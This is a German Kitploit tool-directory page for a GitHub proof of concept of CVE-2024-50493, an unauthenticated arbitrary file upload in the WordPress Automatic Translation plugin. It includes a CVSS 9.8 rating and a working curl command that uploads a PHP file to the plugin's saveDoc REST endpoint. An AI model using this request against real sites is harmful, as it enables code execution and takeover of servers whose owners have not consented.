Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-50493 — Automatic Translation <= 1.0.4 - Nicht authentifizierter beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-50493
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPayload-Entwicklung
GitHubrandomrobbiebf/cve-2024-50493

CVE-2024-50493

Automatic Translation <= 1.0.4 - Nicht authentifizierter beliebiger Datei-Upload

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50493

Automatic Translation <= 1.0.4 - Nicht authentifizierter beliebiger Dateiupload

Beschreibung:

Das Automatic Translation Plugin für WordPress ist anfällig für beliebige Dateiuploads aufgrund fehlender Dateityp-Validierung in allen Versionen bis einschließlich 1.0.4. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf den Server der betroffenen Website hochzuladen, was die Ausführung von Remote-Code ermöglichen kann.

root@kitploit:~
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation

POC

root@kitploit:~
curl -X POST \
  -F "file_name=info.php" \
  -F "file_url=@/tmp/info.php" \
  "http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"
Tool herunterladen